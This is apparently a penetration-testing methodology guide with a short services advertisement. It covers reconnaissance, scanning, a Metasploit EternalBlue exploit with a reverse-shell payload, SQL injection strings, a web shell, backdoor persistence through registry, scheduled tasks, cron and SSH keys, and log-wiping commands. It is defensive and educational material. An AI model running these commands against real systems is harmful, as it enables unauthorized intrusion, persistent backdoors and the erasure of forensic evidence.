Attack methodology provides a systematic framework for conducting professional penetration testing. This guide covers the complete attack lifecycle from reconnaissance to post-exploitation, helping security professionals execute thorough and effective assessments.
About Attack Methodology
A structured attack methodology ensures comprehensive coverage of all security aspects while maintaining professionalism and legal compliance. Understanding each phase is crucial for effective penetration testing.
Phase 1: Reconnaissance
Reconnaissance is the information gathering phase where attackers collect as much data as possible about the target. This phase is divided into passive and active reconnaissance.
Passive Reconnaissance
# WHOIS Lookup
whois target.com
# DNS Enumeration
dig target.com ANY
nslookup -type=any target.com
# Google Dorking
site:target.com filetype:pdf
site:target.com inurl:admin
# Social Media Intelligence
# LinkedIn, Twitter, Facebook research
# Employee identification
# Technology stack identification
Active Reconnaissance
# Network Scanning
nmap -sn 192.168.1.0/24
# Port Scanning
nmap -p- target.com
# Service Version Detection
nmap -sV -p 80,443,22,21 target.com
# OS Detection
nmap -O target.com
Phase 2: Scanning & Enumeration
This phase involves actively probing the target systems to identify vulnerabilities, services, and potential entry points.
Legal Compliance
Always ensure you have written authorization before conducting any active scanning or penetration testing activities. Unauthorized scanning may be illegal in many jurisdictions.
Network Scanning
# Comprehensive Port Scan
nmap -sS -sV -O -p- target.com -oA scan_results
# UDP Scan
nmap -sU -p 53,161,162,137,138,139 target.com
# Vulnerability Scanning
nmap --script vuln target.com
# NSE Scripts for Specific Services
nmap --script=http-enum target.com
Web Application Enumeration
# Directory Brute-forcing
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
# Subdomain Enumeration
subfinder -d target.com
amass enum -d target.com
# Technology Detection
whatweb http://target.com
wappalyzer (browser extension)
Phase 3: Gaining Access (Exploitation)
The exploitation phase involves actively attempting to gain unauthorized access to systems by exploiting identified vulnerabilities.
Common Exploitation Techniques
# Metasploit Framework
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit
# SQL Injection (Manual)
' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
# Web Shell Upload
# Upload malicious PHP/ASP/JSP file
# Access: http://target.com/uploads/shell.php?cmd=whoami
Exploitation Best Practices
- Always test exploits in a controlled environment first
- Document all exploitation attempts and results
- Have a backup plan if primary exploit fails
- Consider system stability - avoid DoS conditions
- Use the least invasive method that achieves objectives
Phase 4: Maintaining Access
Once access is gained, attackers establish persistence to maintain long-term access to compromised systems.
Persistence Mechanisms
# Windows Persistence
# Registry Run Key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
# Scheduled Task
schtasks /create /tn "UpdateTask" /tr "C:\backdoor.exe" /sc daily /st 09:00
# Linux Persistence
# Cron Job
(crontab -l; echo "@reboot /tmp/backdoor.sh") | crontab -
# SSH Key Installation
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
Post-Exploitation Activities
- Privilege Escalation: Elevate access to administrator/root level
- Lateral Movement: Move to other systems in the network
- Data Exfiltration: Extract sensitive information
- Network Pivoting: Use compromised system to access isolated networks
- Credential Harvesting: Collect usernames, passwords, hashes
Phase 5: Covering Tracks
While ethical penetration testers document all activities, understanding anti-forensics techniques is important for defensive purposes and threat modeling.
# Windows Log Clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Linux Log Manipulation
echo "" > /var/log/auth.log
history -c
# Timestamp Modification
touch -r original_file modified_file
# Remove Tools and Artifacts
rm -rf /tmp/tools/
shred -vfz -n 10 sensitive_file.txt
Attack Frameworks and Standards
MITRE ATT&CK Framework
The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. It provides a comprehensive matrix of:
- Tactics: The "why" of an attack (Initial Access, Execution, Persistence, etc.)
- Techniques: The "how" of achieving tactical goals
- Procedures: Specific implementations of techniques
Cyber Kill Chain
HackHub Professional Services
Expert Penetration Testing by HackHub Team
With over 10 years of cybersecurity experience, the HackHub team provides comprehensive penetration testing services following industry-standard methodologies. Our systematic approach ensures thorough assessment of your security posture.
- Web Application Penetration Testing
- Internal Network Security Assessment
- Red Team Operations
- Social Engineering Assessments
Contact us at [email protected] for professional security services.
Reporting and Documentation
A professional penetration test is incomplete without proper documentation. The final report should include:
- Executive Summary: High-level overview for management
- Methodology: Detailed description of testing approach
- Findings: All vulnerabilities discovered with severity ratings
- Evidence: Screenshots, logs, and proof of concept
- Recommendations: Remediation steps for each finding
- Technical Details: Complete technical information for security teams
Ethical Guidelines
All penetration testing must be conducted ethically and legally:
- Obtain written authorization before testing
- Define clear scope and boundaries
- Respect privacy and data protection laws
- Report findings responsibly
- Do not cause unnecessary harm or disruption
Conclusion
A systematic attack methodology is essential for conducting professional and effective penetration tests. By following a structured approach through reconnaissance, scanning, exploitation, post-exploitation, and reporting, security professionals can thoroughly assess an organization's security posture and provide actionable recommendations for improvement.
Remember that penetration testing is both an art and a science - while methodologies provide structure, creativity and adaptability are equally important for success.